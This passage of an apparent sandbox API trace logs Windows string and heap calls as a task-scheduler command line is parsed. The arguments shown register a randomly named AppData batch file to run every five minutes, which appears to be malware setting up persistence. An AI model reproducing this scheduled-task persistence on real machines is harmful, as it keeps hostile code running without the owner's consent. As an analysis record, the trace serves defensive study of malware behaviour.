_Buffer="|tr|") returned 4 [0171.806] lstrlenW (lpString="|change|") returned 8 [0171.806] lstrlenW (lpString="|tr|") returned 4 [0171.806] StrStrIW (lpFirst="|change|", lpSrch="|tr|") returned 0x0 [0171.806] SetLastError (dwErrCode=0x490) [0171.806] lstrlenW (lpString="run") returned 3 [0171.806] lstrlenW (lpString="run") returned 3 [0171.806] _memicmp (_Buf1=0x9d4dc8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0171.807] lstrlenW (lpString="tr") returned 2 [0171.807] _memicmp (_Buf1=0x9d4df8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0171.807] _vsnwprintf (in: _Buffer=0x9d5450, _BufferCount=0x6, _Format="|%s|", _ArgList=0x2dfac8 | out: _Buffer="|run|") returned 5 [0171.807] _vsnwprintf (in: _Buffer=0x9d5410, _BufferCount=0x5, _Format="|%s|", _ArgList=0x2dfac8 | out: _Buffer="|tr|") returned 4 [0171.807] lstrlenW (lpString="|run|") returned 5 [0171.807] lstrlenW (lpString="|tr|") returned 4 [0171.807] StrStrIW (lpFirst="|run|", lpSrch="|tr|") returned 0x0 [0171.807] SetLastError (dwErrCode=0x490) [0171.807] lstrlenW (lpString="end") returned 3 [0171.807] lstrlenW (lpString="end") returned 3 [0171.807] _memicmp (_Buf1=0x9d4dc8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0171.807] lstrlenW (lpString="tr") returned 2 [0171.807] _memicmp (_Buf1=0x9d4df8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0171.807] _vsnwprintf (in: _Buffer=0x9d5450, _BufferCount=0x6, _Format="|%s|", _ArgList=0x2dfac8 | out: _Buffer="|end|") returned 5 [0171.807] _vsnwprintf (in: _Buffer=0x9d5410, _BufferCount=0x5, _Format="|%s|", _ArgList=0x2dfac8 | out: _Buffer="|tr|") returned 4 [0171.807] lstrlenW (lpString="|end|") returned 5 [0171.808] lstrlenW (lpString="|tr|") returned 4 [0171.808] StrStrIW (lpFirst="|end|", lpSrch="|tr|") returned 0x0 [0171.808] SetLastError (dwErrCode=0x490) [0171.808] lstrlenW (lpString="showsid") returned 7 [0171.808] lstrlenW (lpString="showsid") returned 7 [0171.808] _memicmp (_Buf1=0x9d4dc8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0171.808] lstrlenW (lpString="tr") returned 2 [0171.808] _memicmp (_Buf1=0x9d4df8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0171.808] _vsnwprintf (in: _Buffer=0x9d5450, _BufferCount=0xa, _Format="|%s|", _ArgList=0x2dfac8 | out: _Buffer="|showsid|") returned 9 [0171.808] _vsnwprintf (in: _Buffer=0x9d5410, _BufferCount=0x5, _Format="|%s|", _ArgList=0x2dfac8 | out: _Buffer="|tr|") returned 4 [0171.808] lstrlenW (lpString="|showsid|") returned 9 [0171.808] lstrlenW (lpString="|tr|") returned 4 [0171.808] StrStrIW (lpFirst="|showsid|", lpSrch="|tr|") returned 0x0 [0171.808] SetLastError (dwErrCode=0x490) [0171.808] SetLastError (dwErrCode=0x490) [0171.808] SetLastError (dwErrCode=0x0) [0171.808] lstrlenW (lpString="/tr") returned 3 [0171.809] StrChrIW (lpStart="/tr", wMatch=0x3a) returned 0x0 [0171.809] SetLastError (dwErrCode=0x490) [0171.809] SetLastError (dwErrCode=0x0) [0171.809] lstrlenW (lpString="/tr") returned 3 [0171.809] GetProcessHeap () returned 0x9c0000 [0171.809] RtlAllocateHeap (HeapHandle=0x9c0000, Flags=0xc, Size=0x8) returned 0x9d6a60 [0171.809] GetProcessHeap () returned 0x9c0000 [0171.809] RtlAllocateHeap (HeapHandle=0x9c0000, Flags=0xc, Size=0x14) returned 0x9d5490 [0171.809] SetLastError (dwErrCode=0x0) [0171.809] SetLastError (dwErrCode=0x0) [0171.809] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\fMXj4weL.bat") returned 58 [0171.809] lstrlenW (lpString="-/") returned 2 [0171.809] StrChrIW (lpStart="-/", wMatch=0x43) returned 0x0 [0171.809] SetLastError (dwErrCode=0x490) [0171.809] SetLastError (dwErrCode=0x490) [0171.809] SetLastError (dwErrCode=0x0) [0171.809] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\fMXj4weL.bat") returned 58 [0171.809] StrChrIW (lpStart="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\fMXj4weL.bat", wMatch=0x3a) returned=":\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\fMXj4weL.bat" [0171.809] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\fMXj4weL.bat") returned 58 [0171.809] GetProcessHeap () returned 0x9c0000 [0171.809] RtlAllocateHeap (HeapHandle=0x9c0000, Flags=0xc, Size=0x10) returned 0x9d4e10 [0171.809] _memicmp (_Buf1=0x9d4e10, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0171.809] GetProcessHeap () returned 0x9c0000 [0171.809] RtlAllocateHeap (HeapHandle=0x9c0000, Flags=0xc, Size=0xc) returned 0x9d4e28 [0171.810] GetProcessHeap () returned 0x9c0000 [0171.810] RtlAllocateHeap (HeapHandle=0x9c0000, Flags=0xc, Size=0x10) returned 0x9d4e40 [0171.810] _memicmp (_Buf1=0x9d4e40, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0171.810] GetProcessHeap () returned 0x9c0000 [0171.810] RtlAllocateHeap (HeapHandle=0x9c0000, Flags=0xc, Size=0x7a) returned 0x9d6a70 [0171.810] SetLastError (dwErrCode=0x7a) [0171.810] SetLastError (dwErrCode=0x0) [0171.810] SetLastError (dwErrCode=0x0) [0171.810] lstrlenW (lpString="C") returned 1 [0171.810] SetLastError (dwErrCode=0x490) [0171.810] SetLastError (dwErrCode=0x0) [0171.810] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\fMXj4weL.bat") returned 58 [0171.810] GetProcessHeap () returned 0x9c0000 [0171.810] RtlAllocateHeap (HeapHandle=0x9c0000, Flags=0xc, Size=0x76) returned 0x9cf830 [0171.810] GetProcessHeap () returned 0x9c0000 [0171.810] RtlAllocateHeap (HeapHandle=0x9c0000, Flags=0xc, Size=0x14) returned 0x9d54b0 [0171.810] SetLastError (dwErrCode=0x0) [0171.810] SetLastError (dwErrCode=0x0) [0171.810] lstrlenW (lpString="/sc") returned 3 [0171.810] lstrlenW (lpString="-/") returned 2 [0171.810] StrChrIW (lpStart="-/", wMatch=0x2f) returned="/" [0171.810] lstrlenW (lpString="?") returned 1 [0171.810] lstrlenW (lpString="?") returned 1 [0171.810] _memicmp (_Buf1=0x9d4dc8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0171.810] lstrlenW (lpString="sc") returned 2 [0171.810] _memicmp (_Buf1=0x9d4df8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0171.810] _vsnwprintf (in: _Buffer=0x9d5450, _BufferCount=0x4, _Format="|%s|", _ArgList=0x2dfac8 | out: _Buffer="|?|") returned 3 [0171.811] _vsnwprintf (in: _Buffer=0x9d5410, _BufferCount=0x5, _Format="|%s|", _ArgList=0x2dfac8 | out: _Buffer="|sc|") returned 4 [0171.811] lstrlenW (lpString="|?|") returned 3 [0171.811] lstrlenW (lpString="|sc|") returned 4 [0171.811] SetLastError (dwErrCode=0x490) [0171.811] lstrlenW (lpString="create") returned 6 [0171.811] lstrlenW (lpString="create") returned 6 [0171.811] _memicmp (_Buf1=0x9d4dc8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0171.811] lstrlenW (lpString="sc") returned 2 [0171.811] _memicmp (_Buf1=0x9d4df8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0171.811] _vsnwprintf (in: _Buffer=0x9d5450, _BufferCount=0x9, _Format="|%s|", _ArgList=0x2dfac8 | out: _Buffer="|create|") returned 8 [0171.811] _vsnwprintf (in: _Buffer=0x9d5410, _BufferCount=0x5, _Format="|%s|", _ArgList=0x2dfac8 | out: _Buffer="|sc|") returned 4 [0171.811] lstrlenW (lpString="|create|") returned 8 [0171.811] lstrlenW (lpString="|sc|") returned 4 [0171.811] StrStrIW (lpFirst="|create|", lpSrch="|sc|") returned 0x0 [0171.811] SetLastError (dwErrCode=0x490) [0171.811] lstrlenW (lpString="delete") returned 6 [0171.811] lstrlenW (lpString="delete") returned 6 [0171.811] _memicmp (_Buf1=0x9d4dc8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0171.812] lstrlenW (lpString="sc") returned 2 [0171.812] _memicmp (_Buf1=0x9d4df8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0171.812] _vsnwprintf (in: _Buffer=0x9d5450, _BufferCount=0x9, _Format="|%s|", _ArgList=0x2dfac8 | out: _Buffer="|delete|") returned 8 [0171.812] _vsnwprintf (in: _Buffer=0x9d5410, _BufferCount=0x5, _Format="|%s|", _ArgList=0x2dfac8 | out: _Buffer="|sc|") returned 4 [0171.812] lstrlenW (lpString="|delete|") returned 8 [0171.812] lstrlenW (lpString="|sc|") returned 4 [0171.812] StrStrIW (lpFirst="|delete|", lpSrch="|sc|") returned 0x0 [0171.812] SetLastError (dwErrCode=0x490) [0171.812] lstrlenW (lpString="query") returned 5 [0171.812] lstrlenW (lpString="query") returned 5 [0171.812] _memicmp (_Buf1=0x9d4dc8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0171.812] lstrlenW (lpString="sc") returned 2 [0171.812] _memicmp (_Buf1=0x9d4df8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0171.812] _vsnwprintf (in: _Buffer=0x9d5450, _BufferCount=0x8, _Format="|%s|", _ArgList=0x2dfac8 | out: _Buffer="|query|") returned 7 [0171.812] _vsnwprintf (in: _Buffer=0x9d5410, _BufferCount=0x5, _Format="|%s|", _ArgList=0x2dfac8 | out: _Buffer="|sc|") returned 4 [0171.812] lstrlenW (lpString="|query|") returned 7 [0171.812] lstrlenW (lpString="|sc|") returned 4 [0171.812] StrStrIW (lpFirst="|query|", lpSrch="|sc|") returned 0x0 [0171.812] SetLastError (dwErrCode=0x490) [0171.812] lstrlenW (lpString="change") returned 6 [0171.813] lstrlenW (lpString="change") returned 6 [0171.813] _memicmp (_Buf1=0x9d4dc8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0171.813] lstrlenW (lpString="sc") returned 2 [0171.813] _memicmp (_Buf1=0x9d4df8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0171.813] _vsnwprintf (in: _Buffer=0x9d5450, _BufferCount=0x9, _Format="|%s|", _ArgList=0x2dfac8 | out: _Buffer="|change|") returned 8 [0171.813] _vsnwprintf (in: _Buffer=0x9d5410, _BufferCount=0x5, _Format="|%s|", _ArgList=0x2dfac8 | out: _Buffer="|sc|") returned 4 [0171.813] lstrlenW (lpString="|change|") returned 8 [0171.813] lstrlenW (lpString="|sc|") returned 4 [0171.813] StrStrIW (lpFirst="|change|", lpSrch="|sc|") returned 0x0 [0171.813] SetLastError (dwErrCode=0x490) [0171.813] lstrlenW (lpString="run") returned 3 [0171.813] lstrlenW (lpString="run") returned 3 [0171.813] _memicmp (_Buf1=0x9d4dc8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0171.813] lstrlenW (lpString="sc") returned 2 [0171.813] _memicmp (_Buf1=0x9d4df8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0171.813] _vsnwprintf (in: _Buffer=0x9d5450, _BufferCount=0x6, _Format="|%s|", _ArgList=0x2dfac8 | out: _Buffer="|run|") returned 5 [0171.813] _vsnwprintf (in: _Buffer=0x9d5410, _BufferCount=0x5, _Format="|%s|", _ArgList=0x2dfac8 | out: _Buffer="|sc|") returned 4 [0171.813] lstrlenW (lpString="|run|") returned 5 [0171.813] lstrlenW (lpString="|sc|") returned 4 [0171.814] StrStrIW (lpFirst="|run|", lpSrch="|sc|") returned 0x0 [0171.814] SetLastError (dwErrCode=0x490) [0171.814] lstrlenW (lpString="end") returned 3 [0171.814] lstrlenW (lpString="end") returned 3 [0171.814] _memicmp (_Buf1=0x9d4dc8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0171.814] lstrlenW (lpString="sc") returned 2 [0171.814] _memicmp (_Buf1=0x9d4df8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0171.814] _vsnwprintf (in: _Buffer=0x9d5450, _BufferCount=0x6, _Format="|%s|", _ArgList=0x2dfac8 | out: _Buffer="|end|") returned 5 [0171.814] _vsnwprintf (in: _Buffer=0x9d5410, _BufferCount=0x5, _Format="|%s|", _ArgList=0x2dfac8 | out: _Buffer="|sc|") returned 4 [0171.814] lstrlenW (lpString="|end|") returned 5 [0171.814] lstrlenW (lpString="|sc|") returned 4 [0171.814] StrStrIW (lpFirst="|end|", lpSrch="|sc|") returned 0x0 [0171.814] SetLastError (dwErrCode=0x490) [0171.814] lstrlenW (lpString="showsid") returned 7 [0171.814] lstrlenW (lpString="showsid") returned 7 [0171.814] _memicmp (_Buf1=0x9d4dc8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0171.814] lstrlenW (lpString="sc") returned 2 [0171.814] _memicmp (_Buf1=0x9d4df8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0171.814] _vsnwprintf (in: _Buffer=0x9d5450, _BufferCount=0xa, _Format="|%s|", _ArgList=0x2dfac8 | out: _Buffer="|showsid|") returned 9 [0171.814] _vsnwprintf (in: _Buffer=0x9d5410, _BufferCount=0x5, _Format="|%s|", _ArgList=0x2dfac8 | out: _Buffer="|sc|") returned 4 [0171.814] lstrlenW (lpString="|showsid|") returned 9 [0171.815] lstrlenW (lpString="|sc|") returned 4 [0171.815] StrStrIW (lpFirst="|showsid|", lpSrch="|sc|") returned 0x0 [0171.815] SetLastError (dwErrCode=0x490) [0171.815] SetLastError (dwErrCode=0x490) [0171.815] SetLastError (dwErrCode=0x0) [0171.815] lstrlenW (lpString="/sc") returned 3 [0171.815] StrChrIW (lpStart="/sc", wMatch=0x3a) returned 0x0 [0171.815] SetLastError (dwErrCode=0x490) [0171.815] SetLastError (dwErrCode=0x0) [0171.815] lstrlenW (lpString="/sc") returned 3 [0171.815] GetProcessHeap () returned 0x9c0000 [0171.815] RtlAllocateHeap (HeapHandle=0x9c0000, Flags=0xc, Size=0x8) returned 0x9d6af8 [0171.815] GetProcessHeap () returned 0x9c0000 [0171.815] RtlAllocateHeap (HeapHandle=0x9c0000, Flags=0xc, Size=0x14) returned 0x9d54d0 [0171.815] SetLastError (dwErrCode=0x0) [0171.815] SetLastError (dwErrCode=0x0) [0171.815] lstrlenW (lpString="minute") returned 6 [0171.815] lstrlenW (lpString="-/") returned 2 [0171.815] StrChrIW (lpStart="-/", wMatch=0x6d) returned 0x0 [0171.815] SetLastError (dwErrCode=0x490) [0171.815] SetLastError (dwErrCode=0x490) [0171.815] SetLastError (dwErrCode=0x0) [0171.815] lstrlenW (lpString="minute") returned 6 [0171.815] StrChrIW (lpStart="minute", wMatch=0x3a) returned 0x0 [0171.815] SetLastError (dwErrCode=0x490) [0171.816] SetLastError (dwErrCode=0x0) [0171.816] lstrlenW (lpString="minute") returned 6 [0171.816] GetProcessHeap () returned 0x9c0000 [0171.816] RtlAllocateHeap (HeapHandle=0x9c0000, Flags=0xc, Size=0xe) returned 0x9d4e58 [0171.816] GetProcessHeap () returned 0x9c0000 [0171.816] RtlAllocateHeap (HeapHandle=0x9c0000, Flags=0xc, Size=0x14) returned 0x9d54f0 [0171.816] SetLastError (dwErrCode=0x0) [0171.816] SetLastError (dwErrCode=0x0) [0171.816] lstrlenW (lpString="/mo") returned 3 [0171.816] lstrlenW (lpString="-/") returned 2 [0172.245] StrChrIW (lpStart="-/", wMatch=0x2f) returned="/" [0172.245] lstrlenW (lpString="?") returned 1 [0172.245] lstrlenW (lpString="?") returned 1 [0172.245] _memicmp (_Buf1=0x9d4dc8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0172.245] lstrlenW (lpString="mo") returned 2 [0172.246] _memicmp (_Buf1=0x9d4df8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0172.246] _vsnwprintf (in: _Buffer=0x9d5450, _BufferCount=0x4, _Format="|%s|", _ArgList=0x2dfac8 | out: _Buffer="|?|") returned 3 [0172.246] _vsnwprintf (in: _Buffer=0x9d5410, _BufferCount=0x5, _Format="|%s|", _ArgList=0x2dfac8 | out: _Buffer="|mo|") returned 4 [0172.246] lstrlenW (lpString="|?|") returned 3 [0172.246] lstrlenW (lpString="|mo|") returned 4 [0172.246] SetLastError (dwErrCode=0x490) [0172.246] lstrlenW (lpString="create") returned 6 [0172.246] lstrlenW (lpString="create") returned 6 [0172.246] _memicmp (_Buf1=0x9d4dc8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0172.246] lstrlenW (lpString="mo") returned 2 [0172.246] _memicmp (_Buf1=0x9d4df8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0172.246] _vsnwprintf (in: _Buffer=0x9d5450, _BufferCount=0x9, _Format="|%s|", _ArgList=0x2dfac8 | out: _Buffer="|create|") returned 8 [0172.246] _vsnwprintf (in: _Buffer=0x9d5410, _BufferCount=0x5, _Format="|%s|", _ArgList=0x2dfac8 | out: _Buffer="|mo|") returned 4 [0172.246] lstrlenW (lpString="|create|") returned 8 [0172.246] lstrlenW (lpString="|mo|") returned 4 [0172.246] StrStrIW (lpFirst="|create|", lpSrch="|mo|") returned 0x0 [0172.246] SetLastError (dwErrCode=0x490) [0172.246] lstrlenW (lpString="delete") returned 6 [0172.246] lstrlenW (lpString="delete") returned 6 [0172.247] _memicmp (_Buf1=0x9d4dc8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0172.247] lstrlenW (lpString="mo") returned 2 [0172.247] _memicmp (_Buf1=0x9d4df8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0172.247] _vsnwprintf (in: _Buffer=0x9d5450, _BufferCount=0x9, _Format="|%s|", _ArgList=0x2dfac8 | out: _Buffer="|delete|") returned 8 [0172.247] _vsnwprintf (in: _Buffer=0x9d5410, _BufferCount=0x5, _Format="|%s|", _ArgList=0x2dfac8 | out: _Buffer="|mo|") returned 4 [0172.247] lstrlenW (lpString="|delete|") returned 8 [0172.247] lstrlenW (lpString="|mo|") returned 4 [0172.247] StrStrIW (lpFirst="|delete|", lpSrch="|mo|") returned 0x0 [0172.247] SetLastError (dwErrCode=0x490) [0172.247] lstrlenW (lpString="query") returned 5 [0172.247] lstrlenW (lpString="query") returned 5 [0172.247] _memicmp (_Buf1=0x9d4dc8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0172.247] lstrlenW (lpString="mo") returned 2 [0172.247] _memicmp (_Buf1=0x9d4df8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0172.248] _vsnwprintf (in: _Buffer=0x9d5450, _BufferCount=0x8, _Format="|%s|", _ArgList=0x2dfac8 | out: _Buffer="|query|") returned 7 [0172.248] _vsnwprintf (in: _Buffer=0x9d5410, _BufferCount=0x5, _Format="|%s|", _ArgList=0x2dfac8 | out: _Buffer="|mo|") returned 4 [0172.248] lstrlenW (lpString="|query|") returned 7 [0172.248] lstrlenW (lpString="|mo|") returned 4 [0172.248] StrStrIW (lpFirst="|query|", lpSrch="|mo|") returned 0x0 [0172.248] SetLastError (dwErrCode=0x490) [0172.248] lstrlenW (lpString="change") returned 6 [0172.248] lstrlenW (lpString="change") returned 6 [0172.248] _memicmp (_Buf1=0x9d4dc8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0172.248] lstrlenW (lpString="mo") returned 2 [0172.248] _memicmp (_Buf1=0x9d4df8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0172.248] _vsnwprintf (in: _Buffer=0x9d5450, _BufferCount=0x9, _Format="|%s|", _ArgList=0x2dfac8 | out: _Buffer="|change|") returned 8 [0172.248] _vsnwprintf (in: _Buffer=0x9d5410, _BufferCount=0x5, _Format="|%s|", _ArgList=0x2dfac8 | out: _Buffer="|mo|") returned 4 [0172.248] lstrlenW (lpString="|change|") returned 8 [0172.248] lstrlenW (lpString="|mo|") returned 4 [0172.248] StrStrIW (lpFirst="|change|", lpSrch="|mo|") returned 0x0 [0172.249] SetLastError (dwErrCode=0x490) [0172.249] lstrlenW (lpString="run") returned 3 [0172.249] lstrlenW (lpString="run") returned 3 [0172.249] _memicmp (_Buf1=0x9d4dc8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0172.249] lstrlenW (lpString="mo") returned 2 [0172.249] _memicmp (_Buf1=0x9d4df8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0172.249] _vsnwprintf (in: _Buffer=0x9d5450, _BufferCount=0x6, _Format="|%s|", _ArgList=0x2dfac8 | out: _Buffer="|run|") returned 5 [0172.249] _vsnwprintf (in: _Buffer=0x9d5410, _BufferCount=0x5, _Format="|%s|", _ArgList=0x2dfac8 | out: _Buffer="|mo|") returned 4 [0172.249] lstrlenW (lpString="|run|") returned 5 [0172.249] lstrlenW (lpString="|mo|") returned 4 [0172.249] StrStrIW (lpFirst="|run|", lpSrch="|mo|") returned 0x0 [0172.249] SetLastError (dwErrCode=0x490) [0172.249] lstrlenW (lpString="end") returned 3 [0172.249] lstrlenW (lpString="end") returned 3 [0172.249] _memicmp (_Buf1=0x9d4dc8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0172.249] lstrlenW (lpString="mo") returned 2 [0172.249] _memicmp (_Buf1=0x9d4df8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0172.250] _vsnwprintf (in: _Buffer=0x9d5450, _BufferCount=0x6, _Format="|%s|", _ArgList=0x2dfac8 | out: _Buffer="|end|") returned 5 [0172.250] _vsnwprintf (in: _Buffer=0x9d5410, _BufferCount=0x5, _Format="|%s|", _ArgList=0x2dfac8 | out: _Buffer="|mo|") returned 4 [0172.250] lstrlenW (lpString="|end|") returned 5 [0172.250] lstrlenW (lpString="|mo|") returned 4 [0172.250] StrStrIW (lpFirst="|end|", lpSrch="|mo|") returned 0x0 [0172.250] SetLastError (dwErrCode=0x490) [0172.250] lstrlenW (lpString="showsid") returned 7 [0172.250] lstrlenW (lpString="showsid") returned 7 [0172.250] _memicmp (_Buf1=0x9d4dc8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0172.250] lstrlenW (lpString="mo") returned 2 [0172.250] _memicmp (_Buf1=0x9d4df8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0172.250] _vsnwprintf (in: _Buffer=0x9d5450, _BufferCount=0xa, _Format="|%s|", _ArgList=0x2dfac8 | out: _Buffer="|showsid|") returned 9 [0172.250] _vsnwprintf (in: _Buffer=0x9d5410, _BufferCount=0x5, _Format="|%s|", _ArgList=0x2dfac8 | out: _Buffer="|mo|") returned 4 [0172.250] lstrlenW (lpString="|showsid|") returned 9 [0172.250] lstrlenW (lpString="|mo|") returned 4 [0172.250] StrStrIW (lpFirst="|showsid|", lpSrch="|mo|") returned 0x0 [0172.250] SetLastError (dwErrCode=0x490) [0172.250] SetLastError (dwErrCode=0x490) [0172.250] SetLastError (dwErrCode=0x0) [0172.251] lstrlenW (lpString="/mo") returned 3 [0172.251] StrChrIW (lpStart="/mo", wMatch=0x3a) returned 0x0 [0172.251] SetLastError (dwErrCode=0x490) [0172.251] SetLastError (dwErrCode=0x0) [0172.251] lstrlenW (lpString="/mo") returned 3 [0172.251] GetProcessHeap () returned 0x9c0000 [0172.251] RtlAllocateHeap (HeapHandle=0x9c0000, Flags=0xc, Size=0x8) returned 0x9d6b08 [0172.251] GetProcessHeap () returned 0x9c0000 [0172.251] RtlAllocateHeap (HeapHandle=0x9c0000, Flags=0xc, Size=0x14) returned 0x9d5510 [0172.251] SetLastError (dwErrCode=0x0) [0172.251] SetLastError (dwErrCode=0x0) [0172.251] lstrlenW (lpString="5") returned 1 [0172.251] SetLastError (dwErrCode=0x490) [0172.251] SetLastError (dwErrCode=0x0) [0172.251] lstrlenW (lpString="5") returned 1 [0172.251] StrChrIW (lpStart="5", wMatch=0x3a) returned 0x0 [0172.251] SetLastError (dwErrCode=0x490) [0172.251] SetLastError (dwErrCode=0x0) [0172.251] lstrlenW (lpString="5") returned 1 [0172.252] GetProcessHeap () returned 0x9c0000 [0172.252] RtlAllocateHeap (HeapHandle=0x9c0000, Flags=0xc, Size=0x4) returned 0x9d6b18 [0172.252] GetProcessHeap () returned 0x9c0000 [0172.252] RtlAllocateHeap (HeapHandle=0x9c0000, Flags=0xc, Size=0x14) returned 0x9d5530 [0172.252] SetLastError (dwErrCode=0x0) [0172.252] SetLastError (dwErrCode=0x0) [0172.252] lstrlenW (lpString="/RL") returned 3 [0172.252] lstrlenW (lpString="-/") returned 2 [0172.252] StrChrIW (lpStart="-/", wMatch=0x2f) returned="/" [0172.252] lstrlenW (lpString="?") returned 1 [0172.252] lstrlenW (lpString="?") returned 1 [0172.252] _memicmp (_Buf1=0x9d4dc8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0172.252] lstrlenW (lpString="RL") returned 2 [0172.252] _memicmp (_Buf1=0x9d4df8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0172.252] _vsnwprintf (in: _Buffer=0x9d5450, _BufferCount=0x4, _Format="|%s|", _ArgList=0x2dfac8 | out: _Buffer="|?|") returned 3 [0172.252] _vsnwprintf (in: _Buffer=0x9d5410, _BufferCount=0x5, _Format="|%s|", _ArgList=0x2dfac8 | out: _Buffer="|RL|") returned 4 [0172.252] lstrlenW (lpString="|?|") returned 3 [0172.252] lstrlenW (lpString="|RL|") returned 4 [0172.252] SetLastError (dwErrCode=0x490) [0172.252] lstrlenW (lpString="create") returned 6 [0172.252] lstrlenW (lpString="create") returned 6 [0172.252] _memicmp (_Buf1=0x9d4dc8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0172.253] lstrlenW (lpString="RL") returned 2 [0172.253] _memicmp (_Buf1=0x9d4df8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0172.253] _vsnwprintf (in: _Buffer=0x9d5450, _BufferCount=0x9, _Format="|%s|", _ArgList=0x2dfac8 | out: _Buffer="|create|") returned 8 [0172.253] _vsnwprintf (in: _Buffer=0x9d5410, _BufferCount=0x5, _Format="|%s|", _ArgList=0x2dfac8 | out: _Buffer="|RL|") returned 4 [0172.285] lstrlenW (lpString="|create|") returned 8 [0172.285] lstrlenW (lpString="|RL|") returned 4 [0172.285] StrStrIW (lpFirst="|create|", lpSrch="|RL|") returned 0x0 [0172.285] SetLastError (dwErrCode=0x490) [0172.285] lstrlenW (lpString="delete") returned 6 [0172.285] lstrlenW (lpString="delete") returned 6 [0172.285] _memicmp (_Buf1=0x9d4dc8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0172.285] lstrlenW (lpString="RL") returned 2 [0172.285] _memicmp (_Buf1=0x9d4df8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0172.285] _vsnwprintf (in: _Buffer=0x9d5450, _BufferCount=0x9, _Format="|%s|", _ArgList=0x2dfac8 | out: _Buffer="|delete|") returned 8 [0172.285] _vsnwprintf (in: _Buffer=0x9d5410, _BufferCount=0x5, _Format="|%s|", _ArgList=0x2dfac8 | out: _Buffer="|RL|") returned 4 [0172.285] lstrlenW (lpString="|delete|") returned 8 [0172.285] lstrlenW (lpString="|RL|") returned 4 [0172.285] StrStrIW (lpFirst="|delete|", lpSrch="|RL|") returned 0x0 [0172.285] SetLastError (dwErrCode=0x490) [0172.285] lstrlenW (lpString="query") returned 5 [0172.285] lstrlenW (lpString="query") returned 5 [0172.285] _memicmp (_Buf1=0x9d4dc8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0172.285] lstrlenW (lpString="RL") returned 2 [0172.285] _memicmp (_Buf1=0x9d4df8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0172.286] _vsnwprintf (in: _Buffer=0x9d5450, _BufferCount=0x8, _Format="|%s|", _ArgList=0x2dfac8 | out: _Buffer="|query|") returned 7 [0172.286] _vsnwprintf (in: _Buffer=0x9d5410, _BufferCount=0x5, _Format="|%s|", _ArgList=0x2dfac8 | out: _Buffer="|RL|") returned 4 [0172.286] lstrlenW (lpString="|query|") returned 7 [0172.286] lstrlenW (lpString="|RL|") returned 4 [0172.286] StrStrIW (lpFirst="|query|", lpSrch="|RL|") returned 0x0 [0172.286] SetLastError (dwErrCode=0x490) [0172.286] lstrlenW (lpString="change") returned 6 [0172.286] lstrlenW (lpString="change") returned 6 [0172.286] _memicmp (_Buf1=0x9d4dc8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0172.286] lstrlenW (lpString="RL") returned 2 [0172.286] _memicmp (_Buf1=0x9d4df8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0172.286] _vsnwprintf (in: _Buffer=0x9d5450, _BufferCount=0x9, _Format="|%s|", _ArgList=0x2dfac8 | out: _Buffer="|change|") returned 8 [0172.286] _vsnwprintf (in: _Buffer=0x9d5410, _BufferCount=0x5, _Format="|%s|", _ArgList=0x2dfac8 | out: _Buffer="|RL|") returned 4 [0172.286] lstrlenW (lpString="|change|") returned 8 [0172.286] lstrlenW (lpString="|RL|") returned 4 [0172.287] StrStrIW (lpFirst="|change|", lpSrch="|RL|") returned 0x0 [0172.287] SetLastError (dwErrCode=0x490) [0172.287] lstrlenW (lpString="run") returned 3 [0172.287] lstrlenW (lpString="run") returned 3 [0172.287] _memicmp (_Buf1=0x9d4dc8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0172.287] lstrlenW (lpString="RL") 